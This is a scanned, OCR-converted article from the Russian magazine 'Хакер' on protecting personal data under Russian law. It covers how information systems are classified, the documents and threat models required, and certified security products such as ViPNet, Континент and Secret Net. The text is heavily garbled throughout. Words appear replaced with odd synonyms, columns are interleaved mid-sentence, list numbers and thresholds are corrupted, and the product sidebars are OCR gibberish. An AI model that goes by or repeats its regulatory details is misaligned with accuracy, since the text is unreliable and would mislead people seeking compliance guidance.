данных »? По сути сие электронная вычислительная машина (или мало-мальски компьютеров!, на которых обрабатывается (в книжка числе равно прямо хранится! какая-то

ХАКЕР

01/154/2011

029


SYN/ACK

··---·-·--· -..,................. ·-__-__ --............... ~----····· ,

.. ,

ЗАЩИТА ДАННЫХ ДЛЯ ИНТЕРНЕТЧИКОВ Владельцам интернет-ресурсов, которые решили озаботиться соблюдением законов, автор этих строк бы nорекомендовал убедить подчеркнуть что на сайт www . gosus l ugi.гu . При регистрации после этого вылезает замечательное nользовательское соглашение, сообразно образу да nодобию которого нужно

изготовить свое- сие избавит с солидной части важный боли. В идеале, до этого времени nередаваемые тебе nереанальные показатели nользователей

должны nризнаваться общедостуnными иначе говоря обезличенными.

08-й приказание ФСТЭК обязателен ко прочтению

фицируют сотрудники московской nолиции, нет-нет да и сnрашивают nро­

:1.

оповещение что касается человеке. Когда сколько-нибудь комnьютеров [неважно,

nиску

nодключены они для волокуша либо нет!, целесообразно связывать во одну ИСПДн?

сведениям, начинай а отдельное ФИО- сейчас для общедостуnным иначе обезли­

Вся nрочая рэнкинг ранее относится для доnолнительным

По функциональному nризнаку. То есть, равно как минимальное значение нужно от­

ченным. Помимо класса ИСПДн делать нечего оnределить, являются

раздроблять бухгалтерию с кадров [хотя, кабы машин равным образом там, да вслед за тем

ли они тиnовыми, либо а сnециальными. В нежели отличие? К тиnовым

мало, в таком случае допускается их объединить,- скорехонько всего, оценка выйдет

nредъявляются токмо запросы согласно сохранению конфиденци­

дешевле!. И безвыгодный есть смысл бесnокоиться относительно nриказов равным образом договоров,

альности информации . Если нам нужна вновь равным образом нераздельность и/или

на которых фигурируют ФИО сотрудников равно учредителей- получай моей

достуnность- наша ИСПДн становится сnециальной. Я знаю, который сии

nамяти пока что невыгодный было случая, воеже бери зто обращали внимание. В

три свойства являются основой информационной безоnасности на правах

любом случае, сии показатели дозволено прозвать общедостуnными nри

таковой, равно наметить побольше важное, сообразно сути, нельзя. Позтому оставим

дальнейшей классификации.

юридическую сторону оnределения данного воnроса во стороне да

nосмотрим держи факты. Факты а во следующем. Для тиnовых ИСПДн

РАЗДЕЛЕНИЕ НЕСКОЛЬКИХ ИСПДН

невозможно оформлять частную форма угроз - угрозы безоnасности

Первоначально оно nроисходит держи бумаге. На каждую выделенную

информации во тиnовых ИСПДн оnределены на << П оложе н ии в отношении мето­

ИСПДн составляются отдельные акты обследования да классифи­

дах равно сnособах защиты информации на информационных системах

кации, во которых указываются ее оnределяющие характеристики

nереанальных данных>>- часть самом nриложении для 08-му nриказу

[категория равным образом габариты обрабатываемых nереанальных данных, оnреде­

ФСТЭК. Рекомендую вместе с ним ознакомиться. На nрактике большую пакет

ляемый нате их основании характеристический показатель ИСПДнl, а в свою очередь строение техниче-

тиnовых ИСПДн, которые автор видел, работая интегратором, составляли

ских средств. Стоит nомнить что касается том, что, nомимо неnосредственно

небольшие [до 00 машин! ИСПДн, расnоложенные локально, чаще

комnьютеров, обрабатывающих nереанальные данные, овчинка выделки стоит назвать

всего- разные бухгалтерии равно кадры.

да сетевое оборудование, входящее на ансамбль ИСПДн. Составление nеречня сетевого оборудования- шабаш изобретательный nроцесс.

Однозначно его оnределить nолучится всего-навсего буде ИСПДн выделена в каждый материальный макросегмент Сети . Скорее всего, интересующие нас комnьютеры nодключены ко коммутаторам уровня достуnа, для кото­

рым nодключены да безвыездно оставшиеся рабочая сила станции. В этом случае их

указывать отнюдь не стоит, тем не менее на акте обследования нужно хорош отметить тот факт, в чем дело? ИСПДн входит во смесь общей сетич.

Сnерва разберем классификацию . Существует двоечка классифицирую­ щих nризнака-категория обрабатываемых nереанальных данных

Хnд равным образом габариты Хнnд. С объемом всё-таки nросто: поперед тысячи субъектов nер­ еанальных данных Хнnд равен 0, ото тысячи перед ста тысяч Хнnд равен2, свыше ста тысяч Хнnд равен 0. Нумерация нисходящая- меньшая цифра указывает бери большой масштаб , С Х nд сложнее . Существует че­ тыре категории nереанальных данных. Общедостуnные иначе обезли­

ченные nереанальные причина Хnд равны 0, nереанальные данные, nозволяющие прозрачно отождествлять субъекта nереаналь­

ных данных Хnд равныЗ, прямо отожествлять равным образом nолучить доnолнительную информацию Хnд равны 0, равным образом nолучить особую ин­

формацию [nеречень особых сведений дозволяется отрыть сверху www.wikisec. гu да во трехстороннем nриказеl Хnд равны 0. Если не без; nервой категорией все более-менее ясно, так дальше- хуже. Перечень nереанальных данных, тот или иной необходим пользу кого однозначной идентификации субъекта nереанальных данных, неграмотный оnределен . Не оnределено то,

что-то вычислять общедостуnными nереанальными данными. В качестве отnравной точки могу nорекомендовать исnользовать nасnортные данные человека- фактически, вот поэтому и есть приближенно нас определенно иденти-

030

Девушка рекомендует Stoпegate

Firewall

ХАКЕР

01/154/2011


Н а страже п е р еана льн ых д фактически н ых

Управлени е се ссиями

ПОМНИ О СЕРТИФИКАТАХ На сайте ФСТЭК позволено н айти палитра сертифицированных средств защиты информации, хотя возлюбленный вдали никак не спокон века актуален. Если интересует черт знает что конкретное - в таком случае выгодно отличается попросить у дилера сертификат. И бесспорно глякось промежуток времени его действия! Если срок действия сертификата кончается, а у вендара поуже кушать новая версия- так письменное удостоверение получай старую могут равно никак не продлить. информация в отношении сессии

То есть, самые типовые случаи, нет-нет да и разрабатывание дополнитель­ Це нт р а лизованное у nравn е ние г у лnо й м е жс етевы х как ранов , у становленны х

обычай н овленны х на различны х се гнета х корпорати вно й волокуша ! на для люч а пишущий эти строки ЛВС- ВЛВС )

ного батман кета документов (а сие по образу худо-бедно <<Частая шаблон угроз безопасности переанальных данных>> да <<Частное техническое зада­

ние для разработку системы защите переаналь н ых д практически н ых>> ! оказыва­ лась п росто вещественно невыгодна - расточительство ото использования меньшего количества средств защиты малограмотный покрывала расходов получи и распишись

разработку документов. Если а у тебя сложная распределенная ИСПДн не в таком случае — не то без затей есть желание удалиться через каких-то пункта в, указанных на << Положении в рассуждении мето­ дах .. .>> -то требуется соглашаться свою ИС ПД н специальной.

Кроме того, во п оследней редакции 052-ФЗ указано, который относительно п ератор

Выделенная подсак тож

самопроизвольно определяет реестр необходимых мер равным образом способов в соответствии с защите

защищенные каналы управnения

информации во ИСПДн. Многие коммерческие конторы этому очень обрадовались, эдак вроде сие слыхать бы позволяет оставить с необходимости Мониторинг из осто автор этих строк ния и пол н оф у н ко цион а льно е упр а вл е н ие

П л а тфор ма

Windows равным образом Unix

Си стем а ц ен тр а л изова нн ого

использования сертифицированных средств защиты информации,

упра во л е н равно моя особа сете умереть и малограмотный встать й

одно упоминовение что касается которых правомочно пробудить у системных админи­

безопа сн отросток ю

ISPmonJ

страторов приступы зубый боли да нервную трясучку. К сожалению,

на другом месте сие г касательно но закона указано, который спрос сообразно безопас­ В а р иа н твоя милость да споль з ования СС ПТ-21с насчет - гtс .г u )

ности переанальных данных определяют соответствующие органы

исполнительной центр (и приведен палитра сих органов!. Вот и понимай текущий страсть по образу хочешь. Так аюшки? ваш покорный слуга бы временно никак не стал надеяться на лучшее- пускать в дело сертифицированные доходы защиты

ПАКЕТ ДОКУМЕНТОВ

как ни говорите придется.

ЧТО НАМ ИСПОЛЬЗОВАТЬ? В первую очередь, нужно разгадать , с что автор будем защищаться.

0. 2. 3. 4. 5. 6. 7. 8.

0.

Положение об обработке переанальных данных;

Случай стандартный ИСПДн разбирать нестоит-там всегда ясно.

Аналитический экспозе согласно результатам обследования

А пользу кого специальной составляется << Частная трафарет угроз>>. Она

информационных систем п ереанальных данных;

составляется на соотве т ствии от <<Методикой опре д еления актуаль­

Модель у г роз безопасности переанальных данных;

ности угроз без п асности переанальных данных во информационных

Частная трафарет угроз безопасности переанальных данных;

системах переанальных данных>>. Методика написана более-менее

Приказ насчёт назначении администратора безопасности;

понятным языком , а материалов об том, вроде ее писать, предостаточ­

Приказ в отношении назначении комиссии по мнению защите информации;

но. Ограничусь некоторыми советами:

Инструкция администратора безопасности;

0.

Инструк ц ия пользователям информационных систем

Прочитай << Положение .. .>> да возьми его вслед за основу для того выдумы­ вания возможных угроз- по-другому рискуешь вместе с одной стороны

переана ль ных д а нн ых;

н а п исать сли ш кусок м н об г по отношению кристально комок п ью т ерных угроз, да вычеркнуть с памяти п ро

Акт обследования информационной системы переанальных

организацион н ые моменты;

0.

данных;

00. Акт

классификации информационной системы переанальных

щититься. Для них убирать одна замечательная формулировка: << Данный

данных;

01. Акт

классификации автоматизированной системы;

02 . Технический

Не бойся объяснять те угрозы, через которых твоя милость безвыгодный сможешь за­

серпастый инфо р мационной системы переанальных

атаки подобного рода из возможным уроном субъектам п ереаналь­ ных данных>>. Н в отношении пользуйся ей со умом, никак не считая панацеей с всех

данных;

03. Список лиц, допущенных для обработке информации на ИСПДн;

04. Список лиц, допущенных

лицо угроз безопасности переанальных данных будто бы

неактуальным во связиснесоразмерностью затрат сверху оформление

ко техническому обслуживанию

бед. И ужетем более-не бойся ее видоизменять;

0.

Подумай надо тем , что такое? бы твоя милость истинно хотел исполнить на

технических средств, поступающий на структура информационной

своей сети- безвыгодный с целью защиты переанальных данных, а для того « личной

системы переанальных данных;

гигиены >> . Некоторые добро мож н что касается исполнить равным образом вместе с использова­

05. П еречень обрабатываемых переанальных д анных; 16. Техноло г ический п роцесс обработки п ереанал ь ных д анных; 17. Матрица доступа для ресурсам информационной системы переанальных данных;

08. Акт

ввода информационной системы переанальных данных на

эксплуатацию.

ХАКЕР

01/154/2011

нием сертифицированных средств защиты информации. Как это сдела т ь, пишущий эти строки расскажу отдаление ш е.

Итак, впоследствии того , вроде наша сестра определились от перечнем актуальных

угроз, нужно предпринимать выбором технических средств. Для начала стоит уяснить, аюшки? нам нужны средства, которые имеют договор

031


SYN/ACK по защите ото НСД lнесанкционированного доступа], документ по межсетевым экранам IМСЭ], равно письменное удостоверение объединение шифрованию для того орга­ низации

VPN . Кроме

наличия сертификата необходимо превратить интерес

Модельный линия АПКШ ••континент~~

получи то, можно ли применение выбранного имущество во ИСПДн

вашего класса- эту информацию не грех сыскать во сертификате, Нонтинент

формулировка на виде «допускается ко использованию на ИСПДн поперед

класса К1 включительно>> . Некоторые доходы lв основном- ино­

Mini-IТX

странные] отнюдь не допускаются для использованию на ИСПДн класса К1. Причины такого решения наших сертифицирующих органов лежат, скорее, во политической, а неграмотный исключительно технической области.

0 ~ Ethernet

mtnt

Континент

0 S M6иr/c

l20 Mбt~1/C

000 Мбмт/с

0S Mб01r/t

000Мбит/с

0Гб да #с

0х Et hefnet 00/100/1000

00/ 000/ I QOO {3 оnционаnьно)

IPClOOO

Ethernet 00/100/1000

l xSfPonr мцecМ>~A

д•

".

Итак, дай сделаем беглый сообщение сугубо много раз используемых

сертифицированных технических средств защиты информации. Их ДоS

позволительно расчленить нате три категории:

Континент 2Ur.~tk

ОБЗОР СРЕДСТВ

0.

IPClOO ,

lU

(iК'I И ВНQ-ПiКСИIИЫА

{а111 " вно-~виыА

IIJ\acтepj

IUI.Jtrep)

0SO

000

ДоSОО

До

0000

Локальные СЗИ НСД !средства защиты информации с несанкцио­ нированного доступа]

0. Межсетевыеэкраны 3. Средства шифрования [в эту категорию входят да VРN-решения]. Почему условно? У некоторых решений лакомиться до некоторой степени сертифи­

Модельный линия Континента (из официальной презентации)

ко атов- например, объединение <<НСД равным образом МСЭ>> [межсетевое экранирование], <<МСЭ да шифрование>> да приблизительно далее.

0 Н3С1011Щ!! IPEI~I A 0 COCfЭI vtf>Net CUST0h1 UОДIП !\оМе 05-тм РЭ3П11ЧНЫХ КОМПОН8КТОI, ПОЗ80ПЯJ:\Щ11Х P83ЛH30I'illb МНОЖI!СТIО щенарие1 ЗЗЩIIТW ttнформац~ш 0 со1ременных uуnьтмсеренсиых сетях tiЯ311.

Разберем локальные фонды защиты информации через несанк­ ViPNet Мtnlnistrator ционированного доступа. VIPNetAdmlnistrэtor !Ацl.tнннстратор)- сие Оаэоеыii nроrраLt мный кotJnneкcдnя насrроitкн равно ущ1аеnенмя

Наиболее распространенными являются:

0. Dallas Loc k; 2. СтражNТ; 3. Secгet Net; 4. Сертифицированная

03Щ11ЩtННОИСеТЬ10.110'1ЮЧаDЩШ'ilсtбЯ.

• VIPNet NCC (Центр YnpaвneHIIЯ Сеть10, ЦУС)- nроrрзмr.сное о(lес:nечение. nредназначенное дм KOHфllryPIIPOiaHIIA 01 )"'ЛраапеНИЯ IIIPJY3llbHOi!ЗaЩitЩIHHOЙ UП.IO VIPNet • V!PNet КС & СА (УдостоверАIОЩiнi равно Кnl!)lletOii Цetnp. УКЦ) - nроrрам~о~ное oGec:neчeн~re. коtорое eыnonнRe-r фyt~IЩHtl цetnpa формированкя кn10чей wrtфpotЗНIIR н nереанальных ключе~i nonьзotaн'!nei1-кn10чetoro центра. а

taJOI(e

фfНКЦIIИ YдocrotepЯIOщero Ц!нтра.

VIPNetstate\Vatt11er

видоизменение

Windows 0.

VIPNet StateWateher (Ценrр IAOHIПOPIIHta, Цld) - nporparAJ.tHblli

коммекс, некоторый реаnи.Э.О13Н сообразно кnиент­

серверtЮi\ техноnоnш равным образом nредназначен .цпя центраniUоеанноrо мониrор11нrа соаояН tiЯ узловзащищенноi1 cвrn

VIPNel VIPNet state\Yatctrer nредстэвnяеt соОой nроrраммный сер"р со стандарtноli SОL-базой данных СОСТОЯНМJI YЗIIOI cent. yc:ra.нaenrlta&~lblil соемесrно от ПOVIPHet CUent от 0031.10ЖНОСТЬIО Доа)nа К

Первые двойка капитал защиты отличаются тем, ась? суммарно далеко не имеют аппаратной части, сие исключительно софтверные решения .

Dallas Lock

ЭПIIА даннымtt резуnьrатаu рабоtы nраем анаn1133 состояния yзnot вследствие mаленныi'l WеО.ДОСТ)"'Л с 11сnользоеанttембрауз:ера.

во моей

VIPNet Puьticatlon Service

nрактике на последнее сезон реально неграмотный применялся, с подачи безвыгодный само­

Пporpaur.ca

го удобного интерфейса конфигурированияинеспособности интегриро­

серпtфикатоl)ll mиacot отозванных свршф111(3t01 (СОС) нате точках расnроаранен11Я данных. Также

ваться во

AD . Однако во рабочей группе спирт разворачивается жуть удачно. NT>>настраивается проще, всё-таки его неспособность интегрироваться во AD паки но ограничивает его распространение. Secгet Net [точнее , его сетный вариант] сего недостатка лишен.

OбetneЧIIIatTCЯ lti.IЛOpt СОС, cфOI)t.II)OIЗHHЫX CТOI)OНHIII•IИ УЦ.

<<Страж

VIPNe!ReglslralionPolnt Проrрамuный комnлекс VIPNet ЭЗЩIIЩIННОfО

YiPNet Coor~nator (Unu.x)

поддержки, котораяпозволяетконтролировать процессзагрузки

управления съемными накоnителями информации- в конечном счете , дьявол

Reg!stratlon Potnt (Пtнкт Реmстрацюt}nреднэзначендnя соэданкя N'N pernctpaЦ\111 ЛOЛio30iaTtЛ&il , JII)ЗHIHIIЯ 0)8fИСТI)аЦI\ОННЫХДаННЩ СОЗДЗНifА ЭЭПI)ОС.ОI 013 IIIU Oб01Y*\I&aHIIII 0 УКЦ. а ТЭJОКе 0ЭЛРОСОI НЗ фopr.ti11)083НIIII КЛIОЧI!IЫХ VIPNet на УКЦ

&blЛJ'CIC CII)Т1tфHЦIT08

дистрнбуntео• nоnьэоватеnей тенета

Кроме того, дьявол имеет осуществимость подключения платы аппаратной

со съемных носителей, равно у него аспидски недурственно работает инструмент

VIPtlet PuЫicalion SeMce (CepttlcП~rtкaциll) nредназначена А/IЯ arтoмaт11:UЩIIII nроцеСС~:~ на

Л)'бЛIIKЗЦIIIIIЫПruttHHЫX 0 УЦ Yif'Net ctptМфitКЭfOI (aд,t.IHHHCТpЭJOPOI, ЛOЛioЗOIЗftлt li, ЦIОСС·

0 U111

позволяет без остатка осматривать включение равно размыкание

любых устройств. Для в чем дело? нужны локальные СЗИ НСД? Этот воnрос волнует многих

ViPNet Coordlnator {Linwr.)- f10ЛHOфjo't!IЩIIOH3ЛioHЫЙ nporpa~tMHЫЙ C8PitP 03ЩIIЩIIHHOЙ CI!TII ViPNet устанэаrшвэемый бери ОС llnux сАДРам н 0.4 0131 -2 0.2126 (Aitcтplt6J'ПIIW RedHat Suse \\дР ) 0 зае.исш.tоа\1 от нacrpoeкViPNet Coordlnator может выnоnняn. cneдi'IDЩIIt Ф~litЩ\111 • Сер~ера IР-адресов, • ПpOKat•C8ptep3 laЩIIЩIHHblX COIДIIHIHIIIi; • Tyинenllpy!OЩero сервера (кPIImownюзa}; • ltleжceтeвoro 0\фана дnя отхрыты-. защкщеиных ресурсов да туннеnи руемыхресурсов, • Сереераэащ11щеннойnоЧТЬ1; • Oткээoycтoii'IIIIOfO сарвера эащ11щенной cern VIPNetв конфнrураЦIIН VIPNet Faitover ViPNel Cluster (Windows)

системных администраторов, которым nриходится со ними потеть над чем

Проrрэuмный коммекс

:]. В идеале, они должны суживать подступ для рабочему месту,

OOpallaтыta18 сеточный траф11к, nостулэюЩttй

VIPNet Cluster -зто nporpauuнoe обесnечение АЛЯ ОС WindoWs ХРМв!а/2003, VIPNet Clusщ aJO(.Qбtн 111 неасоnыаtхсетей, неnосреда~енно n одкnюченнЫJ\ для нещ.

основанное бери nрннЦitnю: выеакай достулноспt" раа~редеnен•tя наrруэки. ПК

ВСе первоначальные сведения кластера nредстаiF!ены 0 каw.доi11tз nодкn1011енных сете1i одним н 0 01.с а tP-aдpecou, коtорый одиовре u енно акп11ен сверху асех эnе м ентах кnастера. Это oбetпtЧ II Iaeт моменталь ное

в котором обрабатывается какая-либо важная информация. Не­

nерераслредеnение Ф\-141ЩНЙ 0 мастере на случае отказа ОАНоrо ИJ злементо• ПKVIPNet Ctuster nоэвомет со.эдm IIHфpaap)'К'I)'py, коtорая rapalffitl)rtt еесnере!lойность nередачи данных. давно tex пор, nока хоть Оы

обходимость использования подобных средств является тяжелым

ОДIIНИЗЗЛIIо!ВнtОiкnастерарабОТОСЛОСО0 е н PeKOhltндYtTCЯIIMIТbiCOCТЭ:IIКЛЗCI'epaнelo\IHettpeJt

наследием эволюционного развития государственной системы за­

:O.ПI'UII'WТf11111Щ'IГfll'n:l

R .~тnt.~ mV\1:11\ nnr:n•r:ll\trA

u:~t~r:им:tnмt:U. llflrlll'nм~wnr:n..•ntпnnnя

щиты информации- коли взглянуть получи и распишись сертификаты сих средств

защиты, так хорэ ясно, откуда родом они пришли. Межсетевые экраны:

0. ССПТ-2; 2. АПКШ << Континент >>; 3. VipNet IPeгsonal Fiгewall равным образом Office Fiгewall, VipNet Client]; 4. TгustAccess; 5. Stonegate Fiгewaii/VPN. Часть изо сих решений аппаратная, часть- программная. Пре­

Компоненты

VipNet Custom (с официального сайта)

ГОСУДАРСТВО РЕКОМЕНДУЕТ Если твоя милость работаешь на органа х государственной власти, то,

имущества да нужда обеих вариантов твоя милость равно сам по себе повинен понимать ,

живей всего, свободы выбора средств защиты у тебя безвыгодный будет­

так привести на ум безграмотный помешает. Как минимум, введение аппаратного

чаще общей сложности подобные решения спускаются сверху. Если его до этих пор

решения требует некоторой переработки существующий картеж

никак не было- отнюдь не поленись да составь интерпелляция во вышестоящий орган,

сети, почто влечет ради лицом дополнительные расходы, во так срок что

другим образом может угодить так, который твою сердечно выстроенную СЗПДн

программные решения позволяют сего избежать. Аппаратные

придется разбирать, а впоследствии вновь равно отлынивать вопросов относительно нецелевом

решения как всегда выигрывают за быстродействию равным образом до функциона-

использовании бюджетных средств.

032

ХАКЕР

01/154/2011


На страже переанальных данных

л у. Программные решения- сие система

VipNet- VipNet Client VipNet Custom,

является VРN-клиентом с состава комnлекса

реализующего nрограммный

VPN, nроизводит их отечествен-

ная братия <<Инфотекс>>. В принципе, вничью никак не примечатель­ ные межсетевые экраны, работающие возьми собственном движке,

да Tгust

Access- выработка <<Кода безопасности>>. В нежели между ними разница? VipNet делится бери двушничек продукта- переанальный VipNet Peгsonal Fiгewall, способствующий токмо одинокий сетевой интерфейс, равным образом шлюзовой VipNet Office Fiгewall, сохраняющий

КАК ПОНИЗИТЬ КЛАСС ИСПДН, ЕСЛИ У ТЕБЯ ОБРАБАТЫВАЕТСЯ БОЛЕЕ СТА ТЫСЯЧ СУБЪЕКТОВ?

небольшую толику интерфейсов. Больше разницы средь ними нет. Вотан

Разделить ее. Если исходняк хранятся вещественно получи и распишись разных

равно оный но интерфейс, сам соответственно себе равно оный а функционал. Системы центра­

серверах, в таком случае сие отнюдь не проблема. Другой вопрос, что такое? на истинный

лизованного управления нет, настройки сверху каждом межсетевике

минута сие ранее отнюдь не этак актуально, буде токмо твоя милость невыгодный планируешь

придется воротить рыло отдельно. Возможность выгрузить конфигура­

воспользоваться решение, далеко не сертифицированное перед К1

цию в свою очередь безвыгодный была обнаружена. Tгust

Access

же, во-первых, имеет

допустимость централизованной настройки и, опричь того, реали­ зует дополнительную аутентификацию рядом обращении для защищае­ мым серверам- в соответствии с протоколу КегЬегоs. Достаточно курьезный

посмотреть в сайт отечественного реселлера да развить текущий вопрос.

продукт, но, ко сожалению, автор со ним работал мало, да синь порох отнюдь не могу

Продает их, ко слову сказать,

добавить.

Safe-Line.

VРN-решения:

АППАРАТНЫЕ РЕШЕНИЯ

0. VipNet Custom; 2. АПКШ <<Континент>>.

ССПТ-2- сие всегдашний супермикроэвм на промышленном испол­ нении, мастерящий лещадь FгeeBSD. Добраться перед настроек ОС, ко

Про <<Континент>> моя особа сейчас говорил, в такой мере что такое? скажу пару слов насчет

сожалению, нельзя. Если тебе нужен нетрудно аппаратный межсете­

VipNet Custom. В крест через <<Континента>>, сие во всей полноте программ-

завывание зкран от хорошим быстродействием- спирт к лицу сверху эту роль.

ное решение. Состоит изо трех частей: серверной частичасти почти

Также стоит только отметить, почто своих IР-адресов у него нет, следственно близ

названием VipNet Соогdiпаtог !есть версии подина Windows да Liпux],

внедрении никак не потребно хорэ соединять дополнительные адреса да пере­

клиентской части VipNet Client !Windows only] равным образом программы управ­

краивать схему адресации. Настройка производится в качестве кого локально,

ления !тоже только лишь подина Windows]. Программа управления равно как со­

от консоли, таково равно вследствие веб-интерфейс, какой-никакой вперед

есть расчет с двух частей: <<Центра управления сетью>>, идеже генерируется

требуется хорош включить.

архитектура Сети, равно <<Удостоверяющего Ключевого центра>>, во котором

АПКШ «Континент»- АПКШ расшифровывается наравне

происходит заведование ключами равно сертификатами. Сертификаты

<<аппаратно-программный странность шифрования>>, да ага -у него

использует встроенная электронная почта, быть подписи зашиф­

вкушать отвес сообразно шифрованию. Скажу даже, зачем сие поскорее VРN­

рованных сообщений. Помимо защищенной электронной почты,

решение, нежели без затей межсетевой кинематография . Он как и представляет изо

вкушать равным образом заслоненный мессенджер в виде аськи. Несмотря держи la

себя умная машина на промышленном исполнении не без; FгeeBSD получи и рас